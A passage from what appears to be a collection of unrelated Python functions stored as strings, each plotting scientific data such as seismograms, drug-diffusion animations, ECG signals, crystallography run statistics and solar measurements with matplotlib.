noise*np.max(np.abs(seis))*np.random.randn(seis.size)\n filt = np.arange(1.,15.)\n filtr = filt[::-1]\n filt = np.append(filt,filtr[1:])*1./15.\n noise = np.convolve(noise,filt)\n noise = noise[0:seis.size]\n\n seis = seis + noise\n\n plt.figure(num=0, figsize = (8, 5))\n\n plt.subplot(131)\n plt.plot(wav,twav,linewidth=1,color='black')\n plt.title('Wavelet')\n plt.xlim((-2.,2.))\n plt.grid()\n plt.ylim((tseis.min()-tseis.mean(),tseis.max()-tseis.mean()))\n plt.gca().invert_yaxis()\n plt.setp(plt.xticks()[1],rotation='90',fontsize=9)\n plt.setp(plt.yticks()[1],fontsize=9)\n plt.gca().set_xlabel('Amplitude',fontsize=9)\n plt.gca().set_ylabel('Time (s)',fontsize=9)\n\n plt.subplot(132)\n plt.plot(np.zeros(tref.size),(tseis.max(),tseis.min()),linewidth=2,color='black')\n plt.hlines(tref,np.zeros(len(rseriesconv)),rseriesconv,linewidth=2) #,'marker','none'\n plt.title('Reflectivity')\n plt.grid()\n plt.ylim((0,tseis.max()))\n plt.gca().invert_yaxis()\n plt.xlim((-2.,2.))\n plt.setp(plt.xticks()[1],rotation='90',fontsize=9)\n plt.setp(plt.yticks()[1],fontsize=9)\n plt.gca().set_xlabel('Amplitude',fontsize=9)\n plt.gca().set_ylabel('Time (s)',fontsize=9)\n\n plt.subplot(133)\n plt.plot(seis,tseis,color='black',linewidth=1)\n plt.title('Seismogram')\n plt.grid()\n plt.ylim((tseis.min(),tseis.max()))\n plt.gca().invert_yaxis()\n plt.xlim((-0.95,0.95))\n plt.setp(plt.xticks()[1],rotation='90',fontsize=9)\n plt.setp(plt.yticks()[1],fontsize=9)\n plt.gca().set_xlabel('Amplitude',fontsize=9)\n plt.gca().set_ylabel('Time (s)',fontsize=9)\n\n plt.tight_layout()\n plt.show()", "def plot_visual_abstract():\n # Which generations to plot\n GENERATIONS = [100, 230, 350]\n\n # LunarLander CMA-ES\n experiment_path = glob(\"experiments/wann_LunarLander-v2_CMAES*\")\n assert len(experiment_path) == 1, \"There should be only one CMA-ES experiment with LunarLander-v2\"\n experiment_path = experiment_path[0]\n\n pivector_paths = glob(os.path.join(experiment_path, \"pivectors\", \"*\"))\n\n tsnes = []\n rewards = []\n for generation in GENERATIONS:\n # Find pivector files for specific generation, load them and store points\n generation_paths = [path for path in pivector_paths if \"gen_{}_\".format(generation) in path]\n\n population = [np.load(path) for path in generation_paths]\n population_tsnes = np.array([x[\"tsne\"] for x in population])\n population_rewards = np.array([x[\"average_episodic_reward\"] for x in population])\n tsnes.append(population_tsnes)\n rewards.append(population_rewards)\n\n figure, axs = pyplot.subplots(\n figsize=[2.5 * 3, 2.5],\n nrows=1,\n ncols=len(GENERATIONS),\n sharex=\"all\",\n sharey=\"all\"\n )\n\n min_reward = min(x.min() for x in rewards)\n max_reward = max(x.max() for x in rewards)\n scatter = None\n\n for idx in range(len(GENERATIONS)):\n population_tsne = tsnes[idx]\n population_rewards = rewards[idx]\n generation = GENERATIONS[idx]\n ax = axs[idx]\n\n scatter = ax.scatter(\n population_tsne[:, 0],\n population_tsne[:, 1],\n c=population_rewards,\n vmin=min_reward,\n vmax=max_reward,\n cmap=\"plasma\"\n )\n ax.set_title(\"Generation {}\".format(generation))\n ax.set_xticks([])\n ax.set_yticks([])\n ax.axis(\"off\")\n\n # Making room for colorbar\n # Stackoverflow #13784201\n figure.subplots_adjust(right=1.0)\n cbar = figure.colorbar(scatter)\n cbar.set_ticks([])\n cbar.ax.set_ylabel(\"Reward $\\\\rightarrow$\", rotation=90, fontsize=\"large\")\n\n figure.tight_layout()\n figure.savefig(\"figures/visual_abstract.pdf\", bbox_inches=\"tight\", pad_inches=0.05)", "def plot_fitter(self):\n\n total_time=self.interval*self.maxspectra\n times = np.linspace(self.interval,total_time + 1,self.interval)\n spectra_fitter.main(self.rt_plot.sum_data, times)", "def dynamic_figure(r=None,z=None,t=None):\n global yt, t0, nt, zcut, theta, cnt, main_title\n\n if r is None:\n RunTimeError(\"r is None\")\n if z is None:\n RunTimeError(\"z is None\")\n if t is None:\n RunTimeError(\"t is None\")\n \n theta = linspace( 0.0, 2.0*scipy.pi, num=100)\n \n R, Z = meshgrid(r,z)\n \n fu = FuModel(nt=100)\n \n ycube = fu.FuCon(R, Z, t) # ycube[:,:,:] DATA CUBE!!!\n\n #-----------------------------FIGURES------------------------------\n fig = figure(figsize=(6,8.5))\n \n t0 = 0\n yt = ycube[:,:,t0]\n \n titulo = 'Fu drug diffusion model: t = %07.2f' % t[t0]\n main_title=fig.text(0.25, 0.95, titulo,\n horizontalalignment='left',\n fontproperties=FontProperties(size=16))\n \n cmap = cm.cool\n subplots_adjust(hspace=0.0)\n \n subplot(211)\n ax = gca()\n im1 = imshow(yt,\n interpolation='bilinear',\n cmap=cmap,\n origin='lower',\n extent=(0,1.0,z[0],z[-1]),\n aspect = 0.23\n )\n \n xlabel(r'R = r/a', fontsize=14)\n ylabel(r'Z = z/l', fontsize=14)\n\n subplot(212,aspect='equal')\n ax = gca()\n\n #\n #--- cylindrical cross-section\n \n RAD, THETA = meshgrid(r,theta)\n Xpos = RAD*cos(THETA)\n Ypos = RAD*sin(THETA)\n \n #\n # top cap of cylinder\n #\n #zcut = len(z)-1\n zcut = 0\n if z[0] != 0.0:\n zcut = int(len(z)/2+0.5)\n title('Z = %f'%z[zcut],fontsize=16)\n #\n # Take a cross-section of the cylinder at some point Z ==> radius array of length len(r) \n # -----\n # Trick\n # -----\n # Now create a matrix[len(theta),len(r)] by replicating the above array len(theta) times\n # along dimension 0\n #\n \n zx = outer( ones(len(theta)), yt[zcut,:] )\n \n im2 = pcolormesh(Xpos, Ypos,\n zx,\n shading='flat',\n cmap=cmap)\n \n xlabel(r'X/a', fontsize=14)\n ylabel(r'Y/a', fontsize=14)\n \n #\n #--- new axis for colorbar\n #\n norm = colors.Normalize(vmin=0.0, vmax=1.0)\n im1.set_norm(norm)\n im2.set_norm(norm)\n im1.add_observer(im2)\n \n pos = ax.get_position()\n l, b, w, h = getattr(pos, 'bounds', pos)\n cax = axes([l+w+0.015, b, 0.025, h]) # setup colorbar axes\n colorbar(im1, cax, orientation='vertical') \n \n manager = get_current_fig_manager()\n \n cnt = 0\n files = []\n nt = len(t)\n #\n #------------------------------------------------------------------\n def updatefig(*args):\n global yt, t0, nt, zcut, theta, cnt, main_title\n \n t0 += 1\n if t0 > nt-1:\n return False\n \n yt = ycube[:,:,t0]\n zx = outer( ones(len(theta)), yt[zcut,:] )\n Nx, Ny = yt.shape\n im1.set_array(yt)\n im2.set_array(ravel(zx[0:Nx-1,0:Ny-1]))\n titulo = 'Fu drug diffusion model: t = %07.2f' % t[t0]\n main_title.set_text(titulo)\n manager.canvas.draw()\n \n #fname = '_tmp%03d.jpg' % t0\n fname = '_tmp%03d.png' % t0\n savefig(fname)\n files.append(fname)\n \n cnt += 1\n return True\n #\n #------------------------------------------------------------------\n\n cnt = 0\n gobject.idle_add(updatefig)\n\n ioff()\n show()\n\n command = \"ffmpeg -r 10 -sameq -i _tmp%03d.png test.mp4\"\n #command = \"mencoder -ovc xvid -xvidencopts \" + \\\n # \"pass=2:bitrate=15999:max_bframes=0 \" + \\\n # \"-oac copy -mf fps=10:type=jpeg 'mf://_tmp*.jpg' -vf harddup -ofps 10 \" + \\\n # \"-noskip -of avi -o outputfile.avi\"\n os.system(command)\n for fname in files: os.remove(fname) #clean up\n\n return True", "def _plot_camera_view(self):\n fig, axs = plt.subplots()\n fig.show()\n axs.cla()\n axs.axis([-0.003, 0.003, -0.003, 0.003])\n axs.grid()\n axs.plot([0], [0], 'r+')\n for t_step in range(0, int(self._t_sim / self._dt) + 1, 250):\n axs.plot(\n self._feat_vec[t_step, 0, 0],\n self._feat_vec[t_step, 1, 0], 'ro')\n axs.plot(\n self._feat_vec[t_step, 0, 1],\n self._feat_vec[t_step, 1, 1], 'bo')\n axs.plot(\n self._feat_vec[t_step, 0, 2],\n self._feat_vec[t_step, 1, 2], 'yo')\n axs.plot(\n self._feat_vec[t_step, 0, 3],\n self._feat_vec[t_step, 1, 3], 'go')\n axs.plot(\n self._feat_vec[t_step, 0, 4],\n self._feat_vec[t_step, 1, 4], 'ro')\n plt.pause(1 / self._plot_fps)", "def example3():\n arrive_time=example2() # Get packets arrive time using example1\n time_series.plot_time_series(arrive_time) # Plot time series using packets arrive time", "def ts_method(signal, peaks, template_duration: float = 0.12, fs: int = processing.FS, window: int = 10, **kwargs):\n\n t_dur = round(template_duration * fs)\n if not t_dur % 2 == 0:\n t_dur += 1\n dims = signal.shape\n # if np.max(np.abs(signal[0, :])) < np.max(np.abs(signal[1, :])):\n # r_peaks = find_qrs(signal[1, :], peak_search=peak_search)\n # r_peaks = peak_enhance(signal[1, :], peaks=r_peaks, window=0.2)\n # else:\n # processing.scatter_beautiful(r_peaks * 1000 / fs, title='peaks')\n extracted_signal = np.copy(signal)\n # print(len(r_peaks))\n # Please, rework it...\n for n in range(dims[0]):\n for i in range(0, len(peaks), window):\n\n if i + window > len(peaks):\n r_peaks = peaks[i:]\n else:\n r_peaks = peaks[i:i + window]\n\n template = np.full((len(r_peaks), t_dur), np.nan)\n for num, r_ind in enumerate(r_peaks):\n if r_ind < t_dur // 2:\n template[num, t_dur // 2 - r_ind - 1:] = extracted_signal[n, 0:r_ind + t_dur // 2 + 1]\n elif r_ind + t_dur // 2 + 1 > dims[1]:\n template[num, 0:dims[1] - r_ind + t_dur // 2] = extracted_signal[n, r_ind - t_dur // 2:]\n else:\n template[num] = extracted_signal[n, r_ind - t_dur // 2:r_ind + t_dur // 2]\n template_mean = np.nanmean(template, axis=0) # None for edge cases\n for r_ind in r_peaks:\n if r_ind < t_dur // 2:\n extracted_signal[n, 0:r_ind + t_dur // 2 + 1] -= template_mean[t_dur // 2 - r_ind - 1:]\n # processing.scatter_beautiful(components[n, :], title=' subtracted channel start ' + str(n))\n elif r_ind + t_dur // 2 + 1 > dims[1]:\n extracted_signal[n, r_ind - t_dur // 2:r_ind + t_dur // 2 + 1] -= template_mean[\n 0:dims[1] - r_ind + t_dur // 2]\n # processing.scatter_beautiful(components[n, :], title=' subtracted channel end ' + str(n))\n else:\n extracted_signal[n, r_ind - t_dur // 2:r_ind + t_dur // 2] -= template_mean\n # processing.scatter_beautiful(components[n, :], title=' subtracted channel ' + str(n))\n return extracted_signal", "def plot(self):\n\t\tself.plotOfTF().plot()", "def plot_section(t, syn, obs):\n\n fig, ax = plt.subplots(1, 2, sharex=True, sharey=True, figsize=(8, 8))\n\n for ir in range(syn.shape[0]):\n\n # Synthetic\n ax[0].plot(t, ir + syn[ir, :], 'k')\n ax[0].set_xlabel('Time in s')\n ax[0].set_ylabel('Amplitude')\n ax[0].set_title('Synthetic')\n\n # Noisy observed data\n ax[1].plot(t, ir + obs[ir, :], 'k')\n ax[1].set_xlabel('Time in s')\n ax[1].set_title('Observed')\n ax[1].set_xlim([np.min(t), np.max(t)])\n ax[1].set_ylim([-1, syn.shape[0]+1.5])\n\n plt.tight_layout()\n\n plt.show(block=False)", "def show_plot(self):\n runs = self.GetParent().runs\n if len(runs) <= 0: return\n\n t1 = time.time()\n total_width = self.GetParent().total_width\n\n newwidth = total_width * (self.GetParent().zoom / 100)\n newmid = total_width * (self.GetParent().pan/100)\n newxmin = newmid - (newwidth/2)\n newxmax = newxmin + newwidth\n\n if newxmin < 0:\n newxmin = 0\n newxmax = newwidth\n elif newxmax > total_width:\n newxmax = total_width\n newxmin = newxmax - newwidth\n\n assert newxmin >= 0 and newxmin <= total_width\n\n #print \"**** Zoom: %s, pan: %s, total_width: %s, newwidth: %s, newmid: %s, newxmin: %s, newxmax: %s\" \\\n # %(self.GetParent().zoom,self.GetParent().pan,total_width,newwidth,newmid,newxmin,newxmax)\n\n left = 0\n width_so_far = 0\n self.figure.clear()\n braggsmax = max(flex.max(r.culled_braggs) for r in runs)\n braggsmin = min(flex.min(r.culled_braggs) for r in runs)\n distsmax = max(flex.max(r.culled_distances) for r in runs)\n distsmin = min(flex.min(r.culled_distances) for r in runs)\n sifomax = max(flex.max(r.culled_sifoils) for r in runs)\n sifomin = min(flex.min(r.culled_sifoils) for r in runs)\n wavemax = max(flex.max(r.culled_wavelengths) for r in runs)\n wavemin = min(flex.min(r.culled_wavelengths) for r in runs)\n\n #above tricks don't work for hit rates as they can be empty if the run is new\n goodruns = []\n for run in runs:\n if len(run.hit_rates) > 0: goodruns.append(run)\n if len(goodruns) > 0:\n hitsmax = max(flex.max(r.hit_rates) for r in goodruns)\n hitsmin = min(flex.min(r.hit_rates) for r in goodruns)\n else:\n hitsmax = hitsmin = 0\n\n first_run = True\n for run in runs:\n right = left + run.width()\n\n if right < newxmin or left > newxmax:\n left += run.width()\n #print \"Not showing run %s\"%run.runId\n continue\n\n if left < newxmin:\n xmin = run.min() + (newxmin - left)\n else:\n xmin = run.min()\n\n if right > newxmax:\n xmax = run.min() + (newxmax - left)\n else:\n xmax = run.max()\n\n #print \"Run: %s, run.width(): %s, left: %s, right: %s, run.min(): %s, run.max(): %s, xmin: %s, xmax: %s, width_so_far: %s, xmax-xmin: %s\" \\\n #%(run.runId,run.width(),left,right,run.min(),run.max(),xmin,xmax,width_so_far,xmax-xmin)\n\n ax1 = self.figure.add_axes([0.05+(0.9*width_so_far/newwidth), 0.05, 0.9*(xmax-xmin)/newwidth, 0.4])\n ax2 = self.figure.add_axes([0.05+(0.9*width_so_far/newwidth), 0.45, 0.9*(xmax-xmin)/newwidth, 0.2], sharex=ax1)\n ax3 = self.figure.add_axes([0.05+(0.9*width_so_far/newwidth), 0.65, 0.9*(xmax-xmin)/newwidth, 0.1], sharex=ax1)\n ax4 = self.figure.add_axes([0.05+(0.9*width_so_far/newwidth), 0.75, 0.9*(xmax-xmin)/newwidth, 0.1], sharex=ax1)\n ax5 = self.figure.add_axes([0.05+(0.9*width_so_far/newwidth), 0.85, 0.9*(xmax-xmin)/newwidth, 0.1], sharex=ax1)\n left += run.width()\n width_so_far += (xmax-xmin)\n\n ax1.grid(True, color=\"0.75\")\n ax2.grid(True, color=\"0.75\")\n ax3.grid(True, color=\"0.75\")\n ax4.grid(True, color=\"0.75\")\n ax5.grid(True, color=\"0.75\")\n ax1.plot(run.culled_bragg_times.select(run.culled_indexed),\n run.culled_braggs.select(run.culled_indexed), 'd', color=[0.0,1.0,0.0])\n ax1.plot(run.culled_bragg_times.select(~run.culled_indexed),\n run.culled_braggs.select(~run.culled_indexed), 'd', color=[0.0,0.5,1.0])\n ax2.plot(run.hit_rates_times, run.hit_rates, 'o-', color=[0.0,1.0,0.0])\n ax3.plot(run.culled_bragg_times, run.culled_wavelengths, '^', color=[0.8,0.0,0.2])\n ax4.plot(run.culled_bragg_times, run.culled_sifoils, '<', color=[0.8,0.0,0.2])\n ax5.plot(run.culled_bragg_times, run.culled_distances, '>', color=[0.8,0.0,0.2])\n ax1.set_ylabel(\"# of Bragg spots\")\n ax2.set_ylabel(\"Hit rate (%)\")\n ax3.set_ylabel(\"WaveL\")\n ax4.set_ylabel(\"SiFoils(mm)\")\n ax5.set_ylabel(\"Dist (mm)\")\n ax1.set_xlim(xmin, xmax)\n ax1.set_ylim(braggsmin, braggsmax)\n ax2.set_ylim(hitsmin, hitsmax)\n ax3.set_ylim(wavemin, wavemax)\n ax4.set_ylim(sifomin-10, sifomax+10)\n ax5.set_ylim(distsmin-3, distsmax+3)\n ax1.set_xlabel(\"Time\")\n for ax in ax1, ax2, ax3, ax4, ax5:\n if (ax is not ax1) :\n for label in ax.get_xticklabels():\n label.set_visible(False)\n ax.get_yticklabels()[0].set_visible(False)\n if not first_run:\n ax.get_yaxis().set_visible(False)\n\n ax1.xaxis.set_major_formatter(ticker.FuncFormatter(status_plot.format_time))\n ax3.yaxis.set_major_formatter(ticker.FormatStrFormatter(\"%.3f\"))\n ax5.yaxis.set_major_formatter(ticker.FormatStrFormatter(\"%.0f\"))\n ax5.set_title(\"%d:%d/%d:%.1f%% I:%d\"%(run.runId, run.hits_count, len(run.braggs), 100*run.hits_count/len(run.braggs),run.indexed.count(True)))\n\n labels = ax1.get_xticklabels()\n for label in labels:\n label.set_rotation(30)\n\n first_run = False\n\n self.figure.autofmt_xdate()\n self.canvas.draw()\n self.parent.Refresh()\n\n t2 = time.time()\n print(\"Plotted in %.2fs\" % (t2 - t1))", "def PLOTdetrendPOSITIONfluxFULL(time, flux, position, TCK, **kwargs):\n \n # Calculating the corrections\n # ---------------------------\n fluxCORRECTION = scInterp.splev(position, TCK)\n\n \n # Setting up the figure window\n # ----------------------------\n figPOScorr = pl.figure(figsize=(16,16))\n gsPOScorr = gridspec.GridSpec(2, 2,height_ratios=[1,1], width_ratios=[3,2])\n axTIMEorig = figPOScorr.add_subplot(gsPOScorr[0,0])\t\t\t\t\t\t# Initial flux with time\n axTIMEcorr = figPOScorr.add_subplot(gsPOScorr[1,0], sharex=axTIMEorig, sharey=axTIMEorig)\t\t\t\t\t\t# Corrected flux with time\n axPOSorig = figPOScorr.add_subplot(gsPOScorr[0,1], sharey=axTIMEorig)\t\t\t\t\t\t# Initial flux with position\n axPOScorr = figPOScorr.add_subplot(gsPOScorr[1,1], sharex=axPOSorig, sharey=axTIMEorig)\t\t\t\t\t\t# Corrected flux with position\n \n # Panels related to time\n # ----------------------\n axTIMEorig.plot(time, flux, 'k.', ms=6, alpha=.4)\n pl.tick_params('both',length=10,width=2,which='major'); pl.tick_params('both',length=10,width=1,which='minor')\n pyplot.locator_params(axis = 'x', nbins = 5); pyplot.locator_params(axis = 'y', nbins = 5) \n axTIMEorig.set_title('Original'); axTIMEorig.set_ylabel('Flux [adu]')\n \n axTIMEcorr.plot(time, flux - fluxCORRECTION, 'k.', ms=6, alpha=.4)\n pl.tick_params('both',length=10,width=2,which='major'); pl.tick_params('both',length=10,width=1,which='minor')\n pyplot.locator_params(axis = 'x', nbins = 5); pyplot.locator_params(axis = 'y', nbins = 5) \n axTIMEcorr.set_title('After correction'); axTIMEcorr.set_ylabel('Flux [adu]'); axTIMEcorr.set_ylabel('Time [d]')\n # Panels related to position\n # --------------------------------------\n axPOSorig.plot(position, flux, 'k.', ms=6, alpha=.4)\n axPOSorig.plot(position, fluxCORRECTION, 'r.', ms=6, alpha=.8)\n pl.tick_params('both',length=10,width=2,which='major'); pl.tick_params('both',length=10,width=1,which='minor')\n pyplot.locator_params(axis = 'x', nbins = 5); pyplot.locator_params(axis = 'y', nbins = 5); axPOSorig.set_title('Correction') \n \n axPOScorr.plot(position, flux - fluxCORRECTION, 'k.', ms=6, alpha=.4)\n pl.tick_params('both',length=10,width=2,which='major'); pl.tick_params('both',length=10,width=1,which='minor')\n pyplot.locator_params(axis = 'x', nbins = 5); pyplot.locator_params(axis = 'y', nbins = 5); axPOScorr.set_title('Residuals correction'); axPOScorr.set_ylabel('CCD position [pixel]')\n \n # Settings\n # --------\n axTIMEorig.set_xlim([np.min(time), np.max(time)]); axTIMEorig.set_ylim([np.min(flux)*1.2, np.max(flux)*1.2])\n axPOSorig.set_xlim([np.min(position) + 0.1, np.max(position) + 0.1])\n axTIMEcorr.set_xlabel('Time [d]'); axTIMEorig.set_ylabel('Flux [adu]'); axTIMEcorr.set_ylabel('Flux [adu]'); axPOScorr.set_xlabel('Position [pixel]')\n \n return", "def __plot_T__(self, refresh=False, *args):\n # If plot is not requested, return:\n if not self.plotTeVar.get() or not self.plotTiVar.get():\n return\n\n # Check for a closed window:\n if 'T' in self.plots.keys() and not matplotlib.pyplot.fignum_exists(self.plots['T'].number):\n del self.plots['T']\n refresh = False\n # Update the existing plot, if it exists\n refresh = refresh or 'T' in self.plots.keys()\n if refresh:\n if 'T' in self.plots.keys():\n fig = self.plots['T']\n fig = matplotlib.pyplot.figure(fig.number)\n fig.clear()\n else:\n return\n # Make a Tew window:\n else:\n fig = matplotlib.pyplot.figure(figsize=(4,3))\n fig.canvas.set_window_title('T, time = ' + '{:.3f}'.format(1e9*self.imp.t(self.it)))\n ax = fig.add_subplot(111)\n\n # Plot:\n if self.plotTeVar.get():\n ax.plot(1e4*self.imp.r((self.it), self.ir)[0], self.imp.Te((self.it), self.ir)[0], 'r-', label='e')\n if self.plotTiVar.get():\n ax.plot(1e4*self.imp.r((self.it), self.ir)[0], self.imp.Ti((self.it), self.ir)[0], 'b-', label='i')\n\n ax.set_xlabel('r (um)', fontsize=12)\n ax.set_ylabel('T (keV)', fontsize=12)\n ax.legend()\n\n if self.logxVar.get():\n ax.set_xscale('log')\n if self.logyVar.get():\n ax.set_yscale('log')\n\n matplotlib.pyplot.tight_layout()\n\n if not refresh:\n fig.show()\n fig.canvas.draw()\n if self.wm is not None:\n self.wm.addWindow(matplotlib.pyplot.get_current_fig_manager().window)\n self.plots['T'] = fig", "def plot_true(self, with_clutter = False):\n \n if self.data_generated:\n \n # Choosing a different color for each target\n n_targets = len(self.true_data['targets'])\n cmap = plt.get_cmap('gnuplot')\n colors = [cmap(i) for i in np.linspace(0, 0.9, n_targets)]\n\n # Plot of the ground truth X vs Y\n fig = plt.figure(figsize=(15,5))\n plt.subplot(1,3,1)\n if with_clutter and self.r:\n for k in self.observed_data.keys():\n plt.plot(self.observed_data[k][0], self.observed_data[k][1], 'kx', markersize=1)\n \n for i in self.true_data['targets']:\n plt.plot(self.true_data['all_y'][i][:,0],self.true_data['all_y'][i][:,1],\\\n 'x',label=\"observed track %s\" %i,color=colors[i])\n plt.plot(self.true_data['all_x'][i][:,0],self.true_data['all_x'][i][:,2],\\\n 'o-',label=\"true track %s\" %i,color=colors[i])\n plt.xlabel(\"X\",fontsize=20)\n plt.ylabel(\"Y\",fontsize=20)\n #plt.legend(loc='best')\n\n # self.timeline is a list where self.timeline[i] is the list of time steps\n # at which target i is alive\n #self.timeline = []\n #for i in self.true_data['targets']:\n # if i in self.true_data['disappear_time'].keys():\n # self.timeline.append(np.arange(self.true_data['birth_time'][i],self.true_data['disappear_time'][i],1))\n # else:\n # self.timeline.append(np.arange(self.true_data['birth_time'][i],41,1))\n\n # Plot of the ground truth time vs X\n plt.subplot(1,3,2)\n if with_clutter and self.r:\n for k in self.observed_data.keys(): \n plt.plot(k*np.ones(self.observed_data[k].shape[1]), self.observed_data[k][0], 'kx', markersize=1)\n \n for i in self.true_data['targets']:\n plt.plot(self.timeline[i],self.true_data['all_y'][i][:,0],\\\n 'x',label=\"observed track %s\" %i,color=colors[i])\n plt.plot(self.timeline[i],self.true_data['all_x'][i][:,0],\\\n 'o-',label=\"true track %s\" %i,color=colors[i])\n plt.xlabel(\"time\",fontsize=20)\n plt.ylabel(\"X\",fontsize=20)\n plt.xlim(0,self.n_time_steps+1)\n #plt.legend(loc='upper right')\n\n # Plot of the ground truth time vs Y\n plt.subplot(1,3,3)\n if with_clutter and self.r:\n for k in self.observed_data.keys():\n plt.plot(k*np.ones(self.observed_data[k].shape[1]), self.observed_data[k][1], 'kx', markersize=1)\n for i in self.true_data['targets']:\n plt.plot(self.timeline[i],self.true_data['all_y'][i][:,1],\\\n 'x',label=\"observed track %s\" %i,color=colors[i])\n plt.plot(self.timeline[i],self.true_data['all_x'][i][:,2],\\\n 'o-',label=\"true track %s\" %i,color=colors[i])\n plt.xlabel(\"time\",fontsize=20)\n plt.ylabel(\"Y\",fontsize=20)\n plt.xlim(0,self.n_time_steps+1)\n #plt.legend(loc='upper right')\n plt.show();\n\n elif self.data_given:\n raise ValueError(\"Cannot plot true positions if y_obs is given because the true x are not known.\")\n else:\n raise ValueError(\"No data to plot !\")", "def plot_skeleton(project_dir, part):\n scene_fpath = os.path.join(project_dir, 'scene_sba.json')\n print(scene_fpath)\n K_arr, D_arr, R_arr, t_arr, _ = utils.load_scene(scene_fpath)\n D_arr = D_arr.reshape((-1,4))\n\n print(f\"\\n\\n\\nLoading data\")\n df_paths = sorted(glob.glob(os.path.join(project_dir, '*.h5')))\n #print(df_paths)\n\n points_2d_df = utils.create_dlc_points_2d_file(df_paths)\n triangulate_func = calib.triangulate_points_fisheye\n points_2d_filtered_df = points_2d_df[points_2d_df['likelihood']>0.5]\n points_3d_df = calib.get_pairwise_3d_points_from_df(points_2d_filtered_df, K_arr, D_arr, R_arr, t_arr, triangulate_func)\n\n # estimate initial points\n nose_pts = points_3d_df[points_3d_df[\"marker\"]==part][[\"x\", \"y\", \"z\", \"frame\"]].values\n x_slope, x_intercept, *_ = stats.linregress(nose_pts[:,3], nose_pts[:,0])\n y_slope, y_intercept, *_ = stats.linregress(nose_pts[:,3], nose_pts[:,1])\n z_slope, z_intercept, *_ = stats.linregress(nose_pts[:,3], nose_pts[:,2])\n frame_est = np.arange(100)\n x_est = frame_est*x_slope + x_intercept\n y_est = frame_est*y_slope + y_intercept\n z_est = frame_est*z_slope + z_intercept\n psi_est = np.arctan2(y_slope, x_slope)\n \n #print(points_2d_df)\n #print(points_2d_df[points_2d_df['frame']==160])\n #return([nose_pts[:,0], nose_pts[:,1], nose_pts[:,2]])\n return(x_est, y_est, z_est)", "def data_vis():\n dataroot = 'solar_data.txt'\n debug = False \n diff = False\n X, y = read_data(dataroot, debug, diff)\n\n # First plot the original timeseries\n fig = plt.figure(figsize=(40,40))\n\n fig.add_subplot(3,3,1)\n plt.plot(y)\n plt.title('Avg Global PSP (vent/cor) [W/m^2]')\n # plt.show()\n\n fig.add_subplot(3,3,2)\n plt.plot(X[:,0])\n plt.title('Avg Zenith Angle [degrees]')\n # plt.show()\n\n fig.add_subplot(3,3,3)\n plt.plot(X[:,1])\n plt.title('Avg Azimuth Angle [degrees]')\n # plt.show()\n\n fig.add_subplot(3,3,4)\n plt.plot(X[:,2])\n plt.title('Avg Tower Dry Bulb Temp [deg C]')\n # plt.show()\n\n fig.add_subplot(3,3,5)\n plt.plot(X[:,3])\n plt.title('Avg Tower RH [%]')\n # plt.show()\n\n fig.add_subplot(3,3,6)\n plt.plot(X[:,4])\n plt.title('Avg Total Cloud Cover [%]')\n # plt.show()\n\n fig.add_subplot(3,3,7)\n plt.plot(X[:,5])\n plt.title('Avg Avg Wind Speed @ 6ft [m/s]')\n # plt.show()\n\n ##########################################################################################\n # Plotting the Fourier Transform of the signals\n\n freq = np.fft.fftfreq(len(y), 1*60*60)\n\n fig = plt.figure(figsize=(40,40))\n\n fig.add_subplot(3,3,1)\n plt.plot(freq, np.abs(np.fft.fft(y)))\n plt.title('Avg Global PSP (vent/cor) [W/m^2]')\n # plt.show()\n\n fig.add_subplot(3,3,2)\n plt.plot(freq, np.abs(np.fft.fft(X[:,0])))\n plt.title('Avg Zenith Angle [degrees]')\n # plt.show()\n\n fig.add_subplot(3,3,3)\n plt.plot(freq, np.abs(np.fft.fft(X[:,1])))\n plt.title('Avg Azimuth Angle [degrees]')\n # plt.show()\n\n fig.add_subplot(3,3,4)\n plt.plot(freq, np.abs(np.fft.fft(X[:,2])))\n plt.title('Avg Tower Dry Bulb Temp [deg C]')\n # plt.show()\n\n fig.add_subplot(3,3,5)\n plt.plot(freq, np.abs(np.fft.fft(X[:,3])))\n plt.title('Avg Tower RH [%]')\n # plt.show()\n\n fig.add_subplot(3,3,6)\n plt.plot(freq, np.abs(np.fft.fft(X[:,4])))\n plt.title('Avg Total Cloud Cover [%]')\n # plt.show()\n\n fig.add_subplot(3,3,7)\n plt.plot(freq, np.abs(np.fft.fft(X[:,5])))\n plt.title('Avg Avg Wind Speed @ 6ft [m/s]')\n # plt.show()\n\n ##################################################################################################\n # Print correlation matrix\n\n df = pd.DataFrame(np.c_[y, X])\n df.columns = ['Avg Global PSP (vent/cor) [W/m^2]','Avg Zenith Angle [degrees]','Avg Azimuth Angle [degrees]','Avg Tower Dry Bulb Temp [deg C]','Avg Tower RH [%]','Avg Total Cloud Cover [%]','Avg Avg Wind Speed @ 6ft [m/s]']\n f = plt.figure(figsize=(19, 15))\n plt.matshow(df.corr(), fignum=f.number)\n plt.xticks(range(df.shape[1]), df.columns, fontsize=14, rotation=20)\n plt.yticks(range(df.shape[1]), df.columns, fontsize=14)\n cb = plt.colorbar()\n cb.ax.tick_params(labelsize=14)\n plt.title('Correlation Matrix', fontsize=16);\n plt.show()", "def plot_individual_tm(xdict, ydict, xprop, yprop, documents, spline):\n figure_array = {}\n for item in documents:\n xlabel = \"\\\\textbf{\" + label_dict[xprop] + \"}\"\n ylabel = \"\\\\textbf{\" + label_dict[yprop] + \"}\"\n print str(item[\"path_id\"])\n x = xdict[item[\"path_id\"]]\n y = ydict[item[\"path_id\"]]\n # fig_title = item[\"path_id\"] + \"(\" + item[\"pretty_formula\"] + \")\" # Individual traces\n fig_title = yprop + item[\"cation_type\"] # Plot by cation\n figure_array[item[\"path_id\"]] = plt.figure(fig_title, figsize=(6,6), dpi=plotting_dpi)\n ax = figure_array[item[\"path_id\"]].add_subplot(111)\n ax.scatter(x,y, s=70, zorder=2, color=tm_color_dict[item[\"tm_type\"][0]], linewidths=2.5, edgecolors='black',\n label=item[\"tm_type\"][0])\n if spline:\n tck = interpolate.splrep(x, y, s=0)\n xnew = np.arange(0, 100, 0.1)\n splfit = interpolate.splev(xnew, tck, der=0)\n x = xnew\n y = splfit\n if item[\"path_id\"][-3:] == \"002\":\n ax.plot(x, y, linewidth=2.5, zorder=1, color=tm_color_dict[item[\"tm_type\"][0]], linestyle='dashed')\n else:\n ax.plot(x, y, linewidth=2.5, zorder=1, color=tm_color_dict[item[\"tm_type\"][0]])\n ax.set_xlabel(xlabel, fontsize=24)\n # ax.set_ylim([0,1200])\n # ax.set_xlim([7,22])\n ax.set_ylabel(ylabel, fontsize=24)\n ax.tick_params(axis='x', labelsize=22)\n ax.tick_params(axis='y', labelsize=22)\n border_width = 2\n [i.set_linewidth(border_width) for i in ax.spines.itervalues()]\n 